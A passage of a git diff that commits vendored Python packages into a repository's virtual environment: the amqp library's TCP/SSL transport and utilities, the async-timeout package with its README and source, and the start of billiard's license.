f'{self.sock.getsockname()[0]}:{self.sock.getsockname()[1]}' + dst = f'{self.sock.getpeername()[0]}:{self.sock.getpeername()[1]}' + return f'<{type(self).__name__}: {src} -> {dst} at {id(self):#x}>' + else: + return f'<{type(self).__name__}: (disconnected) at {id(self):#x}>' + + def connect(self): + try: + # are we already connected? 
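+ # Overall flow: _connect() resolves the address and connects the TCP
+ # socket, then _init_socket() applies socket options and timeouts and
+ # writes the AMQP protocol header to start the handshake.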
+ if self.connected: + return + self._connect(self.host, self.port, self.connect_timeout) + self._init_socket( + self.socket_settings, self.read_timeout, self.write_timeout, + ) + # we've sent the banner; signal connect + # EINTR, EAGAIN, EWOULDBLOCK would signal that the banner + # has _not_ been sent + self.connected = True + except (OSError, SSLError): + # if not fully connected, close socket, and reraise error + if self.sock and not self.connected: + self.sock.close() + self.sock = None + raise + + @contextmanager + def having_timeout(self, timeout): + if timeout is None: + yield self.sock + else: + sock = self.sock + prev = sock.gettimeout() + if prev != timeout: + sock.settimeout(timeout) + try: + yield self.sock + except SSLError as exc: + if 'timed out' in str(exc): + # http://bugs.python.org/issue10272 + raise socket.timeout() + elif 'The operation did not complete' in str(exc): + # Non-blocking SSL sockets can throw SSLError + raise socket.timeout() + raise + except OSError as exc: + if exc.errno == errno.EWOULDBLOCK: + raise socket.timeout() + raise + finally: + if timeout != prev: + sock.settimeout(prev) + + def _connect(self, host, port, timeout): + entries = socket.getaddrinfo( + host, port, socket.AF_UNSPEC, socket.SOCK_STREAM, SOL_TCP, + ) + for i, res in enumerate(entries): + af, socktype, proto, canonname, sa = res + try: + self.sock = socket.socket(af, socktype, proto) + try: + set_cloexec(self.sock, True) + except NotImplementedError: + pass + self.sock.settimeout(timeout) + self.sock.connect(sa) + except socket.error: + if self.sock: + self.sock.close() + self.sock = None + if i + 1 >= len(entries): + raise + else: + break + + def _init_socket(self, socket_settings, read_timeout, write_timeout): + self.sock.settimeout(None) # set socket back to blocking mode + self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1) + self._set_socket_options(socket_settings) + + # set socket timeouts + for timeout, interval in ((socket.SO_SNDTIMEO, write_timeout), + (socket.SO_RCVTIMEO, read_timeout)): + if interval is not None: + sec = int(interval) + usec = int((interval - sec) * 1000000) + self.sock.setsockopt( + socket.SOL_SOCKET, timeout, + pack('ll', sec, usec), + ) + self._setup_transport() + + self._write(AMQP_PROTOCOL_HEADER) + + def _get_tcp_socket_defaults(self, sock): + tcp_opts = {} + for opt in KNOWN_TCP_OPTS: + enum = None + if opt == 'TCP_USER_TIMEOUT': + try: + from socket import TCP_USER_TIMEOUT as enum + except ImportError: + # should be in Python 3.6+ on Linux. 
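+ # 18 is the value of TCP_USER_TIMEOUT in the Linux kernel headers
+ # (include/uapi/linux/tcp.h), used here as a fallback constant.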
+ enum = 18 + elif hasattr(socket, opt): + enum = getattr(socket, opt) + + if enum: + if opt in DEFAULT_SOCKET_SETTINGS: + tcp_opts[enum] = DEFAULT_SOCKET_SETTINGS[opt] + elif hasattr(socket, opt): + tcp_opts[enum] = sock.getsockopt( + SOL_TCP, getattr(socket, opt)) + return tcp_opts + + def _set_socket_options(self, socket_settings): + tcp_opts = self._get_tcp_socket_defaults(self.sock) + if socket_settings: + tcp_opts.update(socket_settings) + for opt, val in tcp_opts.items(): + self.sock.setsockopt(SOL_TCP, opt, val) + + def _read(self, n, initial=False): + """Read exactly n bytes from the peer.""" + raise NotImplementedError('Must be overridden in subclass') + + def _setup_transport(self): + """Do any additional initialization of the class.""" + pass + + def _shutdown_transport(self): + """Do any preliminary work in shutting down the connection.""" + pass + + def _write(self, s): + """Completely write a string to the peer.""" + raise NotImplementedError('Must be overridden in subclass') + + def close(self): + if self.sock is not None: + try: + self._shutdown_transport() + except OSError: + pass + + # Call shutdown first to make sure that pending messages + # reach the AMQP broker if the program exits after + # calling this method. + try: + self.sock.shutdown(socket.SHUT_RDWR) + except OSError: + pass + + try: + self.sock.close() + except OSError: + pass + self.sock = None + self.connected = False + + def read_frame(self, unpack=unpack): + """Parse AMQP frame. + + Frame has following format:: + + 0 1 3 7 size+7 size+8 + +------+---------+---------+ +-------------+ +-----------+ + | type | channel | size | | payload | | frame-end | + +------+---------+---------+ +-------------+ +-----------+ + octet short long 'size' octets octet + + """ + read = self._read + read_frame_buffer = EMPTY_BUFFER + try: + frame_header = read(7, True) + read_frame_buffer += frame_header + frame_type, channel, size = unpack('>BHI', frame_header) + # >I is an unsigned int, but the argument to sock.recv is signed, + # so we know the size can be at most 2 * SIGNED_INT_MAX + if size > SIGNED_INT_MAX: + part1 = read(SIGNED_INT_MAX) + + try: + part2 = read(size - SIGNED_INT_MAX) + except (socket.timeout, OSError, SSLError): + # In case this read times out, we need to make sure to not + # lose part1 when we retry the read + read_frame_buffer += part1 + raise + + payload = b''.join([part1, part2]) + else: + payload = read(size) + read_frame_buffer += payload + frame_end = ord(read(1)) + except socket.timeout: + self._read_buffer = read_frame_buffer + self._read_buffer + raise + except (OSError, SSLError) as exc: + if ( + isinstance(exc, socket.error) and os.name == 'nt' + and exc.errno == errno.EWOULDBLOCK # noqa + ): + # On windows we can get a read timeout with a winsock error + # code instead of a proper socket.timeout() error, see + # https://github.com/celery/py-amqp/issues/320 + self._read_buffer = read_frame_buffer + self._read_buffer + raise socket.timeout() + + if isinstance(exc, SSLError) and 'timed out' in str(exc): + # Don't disconnect for ssl read time outs + # http://bugs.python.org/issue10272 + self._read_buffer = read_frame_buffer + self._read_buffer + raise socket.timeout() + + if exc.errno not in _UNAVAIL: + self.connected = False + raise + # frame-end octet must contain '\xce' value + if frame_end == 206: + return frame_type, channel, payload + else: + raise UnexpectedFrame( + f'Received frame_end {frame_end:#04x} while expecting 0xce') + + def write(self, s): + try: + self._write(s) + except 
socket.timeout: + raise + except OSError as exc: + if exc.errno not in _UNAVAIL: + self.connected = False + raise + + +class SSLTransport(_AbstractTransport): + """Transport that works over SSL. + + PARAMETERS: + host: str + + Broker address in format ``HOSTNAME:PORT``. + + connect_timeout: int + + Timeout of creating new connection. + + ssl: bool|dict + + parameters of TLS subsystem. + - when ``ssl`` is not dictionary, defaults of TLS are used + - otherwise: + - if ``ssl`` dictionary contains ``context`` key, + :attr:`~SSLTransport._wrap_context` is used for wrapping + socket. ``context`` is a dictionary passed to + :attr:`~SSLTransport._wrap_context` as context parameter. + All others items from ``ssl`` argument are passed as + ``sslopts``. + - if ``ssl`` dictionary does not contain ``context`` key, + :attr:`~SSLTransport._wrap_socket_sni` is used for + wrapping socket. All items in ``ssl`` argument are + passed to :attr:`~SSLTransport._wrap_socket_sni` as + parameters. + + kwargs: + + additional arguments of + :class:`~amqp.transport._AbstractTransport` class + """ + + def __init__(self, host, connect_timeout=None, ssl=None, **kwargs): + self.sslopts = ssl if isinstance(ssl, dict) else {} + self._read_buffer = EMPTY_BUFFER + super().__init__( + host, connect_timeout=connect_timeout, **kwargs) + + __slots__ = ( + "sslopts", + ) + + def _setup_transport(self): + """Wrap the socket in an SSL object.""" + self.sock = self._wrap_socket(self.sock, **self.sslopts) + self.sock.do_handshake() + self._quick_recv = self.sock.read + + def _wrap_socket(self, sock, context=None, **sslopts): + if context: + return self._wrap_context(sock, sslopts, **context) + return self._wrap_socket_sni(sock, **sslopts) + + def _wrap_context(self, sock, sslopts, check_hostname=None, **ctx_options): + """Wrap socket without SNI headers. + + PARAMETERS: + sock: socket.socket + + Socket to be wrapped. + + sslopts: dict + + Parameters of :attr:`ssl.SSLContext.wrap_socket`. + + check_hostname + + Whether to match the peer cert’s hostname. See + :attr:`ssl.SSLContext.check_hostname` for details. + + ctx_options + + Parameters of :attr:`ssl.create_default_context`. + """ + ctx = ssl.create_default_context(**ctx_options) + ctx.check_hostname = check_hostname + return ctx.wrap_socket(sock, **sslopts) + + def _wrap_socket_sni(self, sock, keyfile=None, certfile=None, + server_side=False, cert_reqs=None, + ca_certs=None, do_handshake_on_connect=False, + suppress_ragged_eofs=True, server_hostname=None, + ciphers=None, ssl_version=None): + """Socket wrap with SNI headers. + + stdlib :attr:`ssl.SSLContext.wrap_socket` method augmented with support + for setting the server_hostname field required for SNI hostname header. + + PARAMETERS: + sock: socket.socket + + Socket to be wrapped. + + keyfile: str + + Path to the private key + + certfile: str + + Path to the certificate + + server_side: bool + + Identifies whether server-side or client-side + behavior is desired from this socket. See + :attr:`~ssl.SSLContext.wrap_socket` for details. + + cert_reqs: ssl.VerifyMode + + When set to other than :attr:`ssl.CERT_NONE`, peers certificate + is checked. Possible values are :attr:`ssl.CERT_NONE`, + :attr:`ssl.CERT_OPTIONAL` and :attr:`ssl.CERT_REQUIRED`. + + ca_certs: str + + Path to “certification authority” (CA) certificates + used to validate other peers’ certificates when ``cert_reqs`` + is other than :attr:`ssl.CERT_NONE`. + + do_handshake_on_connect: bool + + Specifies whether to do the SSL + handshake automatically. 
See + :attr:`~ssl.SSLContext.wrap_socket` for details. + + suppress_ragged_eofs (bool): + + See :attr:`~ssl.SSLContext.wrap_socket` for details. + + server_hostname: str + + Specifies the hostname of the service which + we are connecting to. See :attr:`~ssl.SSLContext.wrap_socket` + for details. + + ciphers: str + + Available ciphers for sockets created with this + context. See :attr:`ssl.SSLContext.set_ciphers` + + ssl_version: + + Protocol of the SSL Context. The value is one of + ``ssl.PROTOCOL_*`` constants. + """ + opts = { + 'sock': sock, + 'server_side': server_side, + 'do_handshake_on_connect': do_handshake_on_connect, + 'suppress_ragged_eofs': suppress_ragged_eofs, + 'server_hostname': server_hostname, + } + + if ssl_version is None: + ssl_version = ( + ssl.PROTOCOL_TLS_SERVER + if server_side + else ssl.PROTOCOL_TLS_CLIENT + ) + + context = ssl.SSLContext(ssl_version) + + if certfile is not None: + context.load_cert_chain(certfile, keyfile) + if ca_certs is not None: + context.load_verify_locations(ca_certs) + if ciphers is not None: + context.set_ciphers(ciphers) + # Set SNI headers if supported. + # Must set context.check_hostname before setting context.verify_mode + # to avoid setting context.verify_mode=ssl.CERT_NONE while + # context.check_hostname is still True (the default value in context + # if client-side) which results in the following exception: + # ValueError: Cannot set verify_mode to CERT_NONE when check_hostname + # is enabled. + try: + context.check_hostname = ( + ssl.HAS_SNI and server_hostname is not None + ) + except AttributeError: + pass # ask forgiveness not permission + + # See note above re: ordering for context.check_hostname and + # context.verify_mode assignments. + if cert_reqs is not None: + context.verify_mode = cert_reqs + + if ca_certs is None and context.verify_mode != ssl.CERT_NONE: + purpose = ( + ssl.Purpose.CLIENT_AUTH + if server_side + else ssl.Purpose.SERVER_AUTH + ) + context.load_default_certs(purpose) + + sock = context.wrap_socket(**opts) + return sock + + def _shutdown_transport(self): + """Unwrap a SSL socket, so we can call shutdown().""" + if self.sock is not None: + self.sock = self.sock.unwrap() + + def _read(self, n, initial=False, + _errnos=(errno.ENOENT, errno.EAGAIN, errno.EINTR)): + # According to SSL_read(3), it can at most return 16kb of data. + # Thus, we use an internal read buffer like TCPTransport._read + # to get the exact number of bytes wanted. + recv = self._quick_recv + rbuf = self._read_buffer + try: + while len(rbuf) < n: + try: + s = recv(n - len(rbuf)) # see note above + except OSError as exc: + # ssl.sock.read may cause ENOENT if the + # operation couldn't be performed (Issue celery#1414). + if exc.errno in _errnos: + if initial and self.raise_on_initial_eintr: + raise socket.timeout() + continue + raise + if not s: + raise OSError('Server unexpectedly closed connection') + rbuf += s + except: # noqa + self._read_buffer = rbuf + raise + result, self._read_buffer = rbuf[:n], rbuf[n:] + return result + + def _write(self, s): + """Write a string out to the SSL socket fully.""" + write = self.sock.write + while s: + try: + n = write(s) + except ValueError: + # AG: sock._sslobj might become null in the meantime if the + # remote connection has hung up. + # In python 3.4, a ValueError is raised is self._sslobj is + # None. + n = 0 + if not n: + raise OSError('Socket closed') + s = s[n:] + + +class TCPTransport(_AbstractTransport): + """Transport that deals directly with TCP socket. 
+ + All parameters are :class:`~amqp.transport._AbstractTransport` class. + """ + + def _setup_transport(self): + # Setup to _write() directly to the socket, and + # do our own buffered reads. + self._write = self.sock.sendall + self._read_buffer = EMPTY_BUFFER + self._quick_recv = self.sock.recv + + def _read(self, n, initial=False, _errnos=(errno.EAGAIN, errno.EINTR)): + """Read exactly n bytes from the socket.""" + recv = self._quick_recv + rbuf = self._read_buffer + try: + while len(rbuf) < n: + try: + s = recv(n - len(rbuf)) + except OSError as exc: + if exc.errno in _errnos: + if initial and self.raise_on_initial_eintr: + raise socket.timeout() + continue + raise + if not s: + raise OSError('Server unexpectedly closed connection') + rbuf += s + except: # noqa + self._read_buffer = rbuf + raise + + result, self._read_buffer = rbuf[:n], rbuf[n:] + return result + + +def Transport(host, connect_timeout=None, ssl=False, **kwargs): + """Create transport. + + Given a few parameters from the Connection constructor, + select and create a subclass of + :class:`~amqp.transport._AbstractTransport`. + + PARAMETERS: + + host: str + + Broker address in format ``HOSTNAME:PORT``. + + connect_timeout: int + + Timeout of creating new connection. + + ssl: bool|dict + + If set, :class:`~amqp.transport.SSLTransport` is used + and ``ssl`` parameter is passed to it. Otherwise + :class:`~amqp.transport.TCPTransport` is used. + + kwargs: + + additional arguments of :class:`~amqp.transport._AbstractTransport` + class + """ + transport = SSLTransport if ssl else TCPTransport + return transport(host, connect_timeout=connect_timeout, ssl=ssl, **kwargs) diff --git a/env/Lib/site-packages/amqp/utils.py b/env/Lib/site-packages/amqp/utils.py new file mode 100644 index 00000000..8ba5f670 --- /dev/null +++ b/env/Lib/site-packages/amqp/utils.py @@ -0,0 +1,64 @@ +"""Compatibility utilities.""" +import logging +from logging import NullHandler + +# enables celery 3.1.23 to start again +from vine import promise # noqa +from vine.utils import wraps + +try: + import fcntl +except ImportError: # pragma: no cover + fcntl = None # noqa + + +def set_cloexec(fd, cloexec): + """Set flag to close fd after exec.""" + if fcntl is None: + return + try: + FD_CLOEXEC = fcntl.FD_CLOEXEC + except AttributeError: + raise NotImplementedError( + 'close-on-exec flag not supported on this platform', + ) + flags = fcntl.fcntl(fd, fcntl.F_GETFD) + if cloexec: + flags |= FD_CLOEXEC + else: + flags &= ~FD_CLOEXEC + return fcntl.fcntl(fd, fcntl.F_SETFD, flags) + + +def coro(gen): + """Decorator to mark generator as a co-routine.""" + @wraps(gen) + def _boot(*args, **kwargs): + co = gen(*args, **kwargs) + next(co) + return co + + return _boot + + +def str_to_bytes(s): + """Convert str to bytes.""" + if isinstance(s, str): + return s.encode('utf-8', 'surrogatepass') + return s + + +def bytes_to_str(s): + """Convert bytes to str.""" + if isinstance(s, bytes): + return s.decode('utf-8', 'surrogatepass') + return s + + +def get_logger(logger): + """Get logger by name.""" + if isinstance(logger, str): + logger = logging.getLogger(logger) + if not logger.handlers: + logger.addHandler(NullHandler()) + return logger diff --git a/env/Lib/site-packages/async_timeout-4.0.3.dist-info/INSTALLER b/env/Lib/site-packages/async_timeout-4.0.3.dist-info/INSTALLER new file mode 100644 index 00000000..a1b589e3 --- /dev/null +++ b/env/Lib/site-packages/async_timeout-4.0.3.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git 
a/env/Lib/site-packages/async_timeout-4.0.3.dist-info/LICENSE b/env/Lib/site-packages/async_timeout-4.0.3.dist-info/LICENSE new file mode 100644 index 00000000..033c86b7 --- /dev/null +++ b/env/Lib/site-packages/async_timeout-4.0.3.dist-info/LICENSE @@ -0,0 +1,13 @@ +Copyright 2016-2020 aio-libs collaboration. + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. diff --git a/env/Lib/site-packages/async_timeout-4.0.3.dist-info/METADATA b/env/Lib/site-packages/async_timeout-4.0.3.dist-info/METADATA new file mode 100644 index 00000000..d8dd6d12 --- /dev/null +++ b/env/Lib/site-packages/async_timeout-4.0.3.dist-info/METADATA @@ -0,0 +1,131 @@ +Metadata-Version: 2.1 +Name: async-timeout +Version: 4.0.3 +Summary: Timeout context manager for asyncio programs +Home-page: https://github.com/aio-libs/async-timeout +Author: Andrew Svetlov +Author-email: andrew.svetlov@gmail.com +License: Apache 2 +Project-URL: Chat: Gitter, https://gitter.im/aio-libs/Lobby +Project-URL: CI: GitHub Actions, https://github.com/aio-libs/async-timeout/actions +Project-URL: Coverage: codecov, https://codecov.io/github/aio-libs/async-timeout +Project-URL: GitHub: issues, https://github.com/aio-libs/async-timeout/issues +Project-URL: GitHub: repo, https://github.com/aio-libs/async-timeout +Classifier: Development Status :: 5 - Production/Stable +Classifier: Topic :: Software Development :: Libraries +Classifier: Framework :: AsyncIO +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: Apache Software License +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: 3.11 +Requires-Python: >=3.7 +Description-Content-Type: text/x-rst +License-File: LICENSE +Requires-Dist: typing-extensions >=3.6.5 ; python_version < "3.8" + +async-timeout +============= +.. image:: https://travis-ci.com/aio-libs/async-timeout.svg?branch=master + :target: https://travis-ci.com/aio-libs/async-timeout +.. image:: https://codecov.io/gh/aio-libs/async-timeout/branch/master/graph/badge.svg + :target: https://codecov.io/gh/aio-libs/async-timeout +.. image:: https://img.shields.io/pypi/v/async-timeout.svg + :target: https://pypi.python.org/pypi/async-timeout +.. image:: https://badges.gitter.im/Join%20Chat.svg + :target: https://gitter.im/aio-libs/Lobby + :alt: Chat on Gitter + +asyncio-compatible timeout context manager. + + +Usage example +------------- + + +The context manager is useful in cases when you want to apply timeout +logic around block of code or in cases when ``asyncio.wait_for()`` is +not suitable. Also it's much faster than ``asyncio.wait_for()`` +because ``timeout`` doesn't create a new task. 
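As a minimal, runnable sketch of that difference (assuming a placeholder ``inner()`` coroutine; this is an editorial illustration, not upstream text):

.. code-block:: python

    import asyncio
    from async_timeout import timeout


    async def inner():
        await asyncio.sleep(0.1)  # stand-in for real work


    async def with_wait_for():
        # asyncio.wait_for() wraps inner() in a brand-new Task.
        await asyncio.wait_for(inner(), 1.5)


    async def with_async_timeout():
        # async-timeout only schedules a timeout callback; no extra Task.
        async with timeout(1.5):
            await inner()


    asyncio.run(with_wait_for())
    asyncio.run(with_async_timeout())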
+
+The ``timeout(delay, *, loop=None)`` call returns a context manager
+that cancels a block on *timeout* expiring::
+
+    from async_timeout import timeout
+    async with timeout(1.5):
+        await inner()
+
+1. If ``inner()`` completes in less than ``1.5`` seconds, nothing
+   happens.
+2. Otherwise ``inner()`` is cancelled internally by sending
+   ``asyncio.CancelledError`` into it, but ``asyncio.TimeoutError`` is
+   raised outside of the context manager scope.
+
+The *timeout* parameter may be ``None`` to disable the timeout logic.
+
+
+Alternatively, ``timeout_at(when)`` can be used for scheduling
+at an absolute time::
+
+    loop = asyncio.get_event_loop()
+    now = loop.time()
+
+    async with timeout_at(now + 1.5):
+        await inner()
+
+
+Please note: it is not POSIX time but a time with an
+undefined starting base, e.g. the time of the system power on.
+
+
+The context manager has an ``.expired`` property for checking whether
+the timeout fired inside the context manager::
+
+    async with timeout(1.5) as cm:
+        await inner()
+    print(cm.expired)
+
+The property is ``True`` if ``inner()`` execution was cancelled by the
+timeout context manager.
+
+If the ``inner()`` call explicitly raises ``TimeoutError``, ``cm.expired``
+is ``False``.
+
+The scheduled deadline time is available as the ``.deadline`` property::
+
+    async with timeout(1.5) as cm:
+        cm.deadline
+
+A timeout that has not expired yet can be rescheduled with the ``shift()``
+or ``update()`` methods::
+
+    async with timeout(1.5) as cm:
+        cm.shift(1)  # add another second of waiting
+        cm.update(loop.time() + 5)  # reschedule to now+5 seconds
+
+Rescheduling is forbidden once the timeout has expired or after exiting the
+``async with`` code block.
+
+
+Installation
+------------
+
+::
+
+    $ pip install async-timeout
+
+The library is Python 3 only!
+
+
+
+Authors and License
+-------------------
+
+The module is written by Andrew Svetlov.
+
+It's *Apache 2* licensed and freely available.
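Putting the pieces of the API above together, here is a minimal, self-contained sketch of a timed-out operation (``fetch_data`` is a hypothetical slow coroutine used only to trigger the timeout):

.. code-block:: python

    import asyncio
    from async_timeout import timeout


    async def fetch_data():
        await asyncio.sleep(2)  # pretend this is slow I/O
        return "payload"


    async def main():
        try:
            async with timeout(1.5) as cm:
                # Reschedule while still inside the block: allow 0.25s more.
                cm.shift(0.25)
                print(await fetch_data())
        except asyncio.TimeoutError:
            # cm.expired is True only when the timeout cancelled the block.
            print("timed out, expired =", cm.expired)


    asyncio.run(main())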
diff --git a/env/Lib/site-packages/async_timeout-4.0.3.dist-info/RECORD b/env/Lib/site-packages/async_timeout-4.0.3.dist-info/RECORD new file mode 100644 index 00000000..835c41b8 --- /dev/null +++ b/env/Lib/site-packages/async_timeout-4.0.3.dist-info/RECORD @@ -0,0 +1,10 @@ +async_timeout-4.0.3.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +async_timeout-4.0.3.dist-info/LICENSE,sha256=4Y17uPUT4sRrtYXJS1hb0wcg3TzLId2weG9y0WZY-Sw,568 +async_timeout-4.0.3.dist-info/METADATA,sha256=WQVcnDIXQ2ntebcm-vYjhNLg_VMeTWw13_ReT-U36J4,4209 +async_timeout-4.0.3.dist-info/RECORD,, +async_timeout-4.0.3.dist-info/WHEEL,sha256=5sUXSg9e4bi7lTLOHcm6QEYwO5TIF1TNbTSVFVjcJcc,92 +async_timeout-4.0.3.dist-info/top_level.txt,sha256=9oM4e7Twq8iD_7_Q3Mz0E6GPIB6vJvRFo-UBwUQtBDU,14 +async_timeout-4.0.3.dist-info/zip-safe,sha256=AbpHGcgLb-kRsJGnwFEktk7uzpZOCcBY74-YBdrKVGs,1 +async_timeout/__init__.py,sha256=A0VOqDGQ3cCPFp0NZJKIbx_VRP1Y2xPtQOZebVIUB88,7242 +async_timeout/__pycache__/__init__.cpython-310.pyc,, +async_timeout/py.typed,sha256=tyozzRT1fziXETDxokmuyt6jhOmtjUbnVNJdZcG7ik0,12 diff --git a/env/Lib/site-packages/async_timeout-4.0.3.dist-info/WHEEL b/env/Lib/site-packages/async_timeout-4.0.3.dist-info/WHEEL new file mode 100644 index 00000000..2c08da08 --- /dev/null +++ b/env/Lib/site-packages/async_timeout-4.0.3.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.41.1) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/env/Lib/site-packages/async_timeout-4.0.3.dist-info/top_level.txt b/env/Lib/site-packages/async_timeout-4.0.3.dist-info/top_level.txt new file mode 100644 index 00000000..ad29955e --- /dev/null +++ b/env/Lib/site-packages/async_timeout-4.0.3.dist-info/top_level.txt @@ -0,0 +1 @@ +async_timeout diff --git a/env/Lib/site-packages/async_timeout-4.0.3.dist-info/zip-safe b/env/Lib/site-packages/async_timeout-4.0.3.dist-info/zip-safe new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/env/Lib/site-packages/async_timeout-4.0.3.dist-info/zip-safe @@ -0,0 +1 @@ + diff --git a/env/Lib/site-packages/async_timeout/__init__.py b/env/Lib/site-packages/async_timeout/__init__.py new file mode 100644 index 00000000..1ffb069f --- /dev/null +++ b/env/Lib/site-packages/async_timeout/__init__.py @@ -0,0 +1,239 @@ +import asyncio +import enum +import sys +import warnings +from types import TracebackType +from typing import Optional, Type + + +if sys.version_info >= (3, 8): + from typing import final +else: + from typing_extensions import final + + +if sys.version_info >= (3, 11): + + def _uncancel_task(task: "asyncio.Task[object]") -> None: + task.uncancel() + +else: + + def _uncancel_task(task: "asyncio.Task[object]") -> None: + pass + + +__version__ = "4.0.3" + + +__all__ = ("timeout", "timeout_at", "Timeout") + + +def timeout(delay: Optional[float]) -> "Timeout": + """timeout context manager. + + Useful in cases when you want to apply timeout logic around block + of code or in cases when asyncio.wait_for is not suitable. For example: + + >>> async with timeout(0.001): + ... async with aiohttp.get('https://github.com') as r: + ... await r.text() + + + delay - value in seconds or None to disable timeout logic + """ + loop = asyncio.get_running_loop() + if delay is not None: + deadline = loop.time() + delay # type: Optional[float] + else: + deadline = None + return Timeout(deadline, loop) + + +def timeout_at(deadline: Optional[float]) -> "Timeout": + """Schedule the timeout at absolute time. 
+ + deadline argument points on the time in the same clock system + as loop.time(). + + Please note: it is not POSIX time but a time with + undefined starting base, e.g. the time of the system power on. + + >>> async with timeout_at(loop.time() + 10): + ... async with aiohttp.get('https://github.com') as r: + ... await r.text() + + + """ + loop = asyncio.get_running_loop() + return Timeout(deadline, loop) + + +class _State(enum.Enum): + INIT = "INIT" + ENTER = "ENTER" + TIMEOUT = "TIMEOUT" + EXIT = "EXIT" + + +@final +class Timeout: + # Internal class, please don't instantiate it directly + # Use timeout() and timeout_at() public factories instead. + # + # Implementation note: `async with timeout()` is preferred + # over `with timeout()`. + # While technically the Timeout class implementation + # doesn't need to be async at all, + # the `async with` statement explicitly points that + # the context manager should be used from async function context. + # + # This design allows to avoid many silly misusages. + # + # TimeoutError is raised immediately when scheduled + # if the deadline is passed. + # The purpose is to time out as soon as possible + # without waiting for the next await expression. + + __slots__ = ("_deadline", "_loop", "_state", "_timeout_handler", "_task") + + def __init__( + self, deadline: Optional[float], loop: asyncio.AbstractEventLoop + ) -> None: + self._loop = loop + self._state = _State.INIT + + self._task: Optional["asyncio.Task[object]"] = None + self._timeout_handler = None # type: Optional[asyncio.Handle] + if deadline is None: + self._deadline = None # type: Optional[float] + else: + self.update(deadline) + + def __enter__(self) -> "Timeout": + warnings.warn( + "with timeout() is deprecated, use async with timeout() instead", + DeprecationWarning, + stacklevel=2, + ) + self._do_enter() + return self + + def __exit__( + self, + exc_type: Optional[Type[BaseException]], + exc_val: Optional[BaseException], + exc_tb: Optional[TracebackType], + ) -> Optional[bool]: + self._do_exit(exc_type) + return None + + async def __aenter__(self) -> "Timeout": + self._do_enter() + return self + + async def __aexit__( + self, + exc_type: Optional[Type[BaseException]], + exc_val: Optional[BaseException], + exc_tb: Optional[TracebackType], + ) -> Optional[bool]: + self._do_exit(exc_type) + return None + + @property + def expired(self) -> bool: + """Is timeout expired during execution?""" + return self._state == _State.TIMEOUT + + @property + def deadline(self) -> Optional[float]: + return self._deadline + + def reject(self) -> None: + """Reject scheduled timeout if any.""" + # cancel is maybe better name but + # task.cancel() raises CancelledError in asyncio world. + if self._state not in (_State.INIT, _State.ENTER): + raise RuntimeError(f"invalid state {self._state.value}") + self._reject() + + def _reject(self) -> None: + self._task = None + if self._timeout_handler is not None: + self._timeout_handler.cancel() + self._timeout_handler = None + + def shift(self, delay: float) -> None: + """Advance timeout on delay seconds. + + The delay can be negative. + + Raise RuntimeError if shift is called when deadline is not scheduled + """ + deadline = self._deadline + if deadline is None: + raise RuntimeError("cannot shift timeout if deadline is not scheduled") + self.update(deadline + delay) + + def update(self, deadline: float) -> None: + """Set deadline to absolute value. + + deadline argument points on the time in the same clock system + as loop.time(). 
+ + If new deadline is in the past the timeout is raised immediately. + + Please note: it is not POSIX time but a time with + undefined starting base, e.g. the time of the system power on. + """ + if self._state == _State.EXIT: + raise RuntimeError("cannot reschedule after exit from context manager") + if self._state == _State.TIMEOUT: + raise RuntimeError("cannot reschedule expired timeout") + if self._timeout_handler is not None: + self._timeout_handler.cancel() + self._deadline = deadline + if self._state != _State.INIT: + self._reschedule() + + def _reschedule(self) -> None: + assert self._state == _State.ENTER + deadline = self._deadline + if deadline is None: + return + + now = self._loop.time() + if self._timeout_handler is not None: + self._timeout_handler.cancel() + + self._task = asyncio.current_task() + if deadline <= now: + self._timeout_handler = self._loop.call_soon(self._on_timeout) + else: + self._timeout_handler = self._loop.call_at(deadline, self._on_timeout) + + def _do_enter(self) -> None: + if self._state != _State.INIT: + raise RuntimeError(f"invalid state {self._state.value}") + self._state = _State.ENTER + self._reschedule() + + def _do_exit(self, exc_type: Optional[Type[BaseException]]) -> None: + if exc_type is asyncio.CancelledError and self._state == _State.TIMEOUT: + assert self._task is not None + _uncancel_task(self._task) + self._timeout_handler = None + self._task = None + raise asyncio.TimeoutError + # timeout has not expired + self._state = _State.EXIT + self._reject() + return None + + def _on_timeout(self) -> None: + assert self._task is not None + self._task.cancel() + self._state = _State.TIMEOUT + # drop the reference early + self._timeout_handler = None diff --git a/env/Lib/site-packages/async_timeout/py.typed b/env/Lib/site-packages/async_timeout/py.typed new file mode 100644 index 00000000..3b94f915 --- /dev/null +++ b/env/Lib/site-packages/async_timeout/py.typed @@ -0,0 +1 @@ +Placeholder diff --git a/env/Lib/site-packages/billiard-4.1.0.dist-info/INSTALLER b/env/Lib/site-packages/billiard-4.1.0.dist-info/INSTALLER new file mode 100644 index 00000000..a1b589e3 --- /dev/null +++ b/env/Lib/site-packages/billiard-4.1.0.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/env/Lib/site-packages/billiard-4.1.0.dist-info/LICENSE.txt b/env/Lib/site-packages/billiard-4.1.0.dist-info/LICENSE.txt new file mode 100644 index 00000000..b9920edb --- /dev/null +++ b/env/Lib/site-packages/billiard-4.1.0.dist-info/LICENSE.txt @@ -0,0 +1,29 @@ +Copyright (c) 2006-2008, R Oudkerk and Contributors + +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions +are met: + +1. Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. +2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the 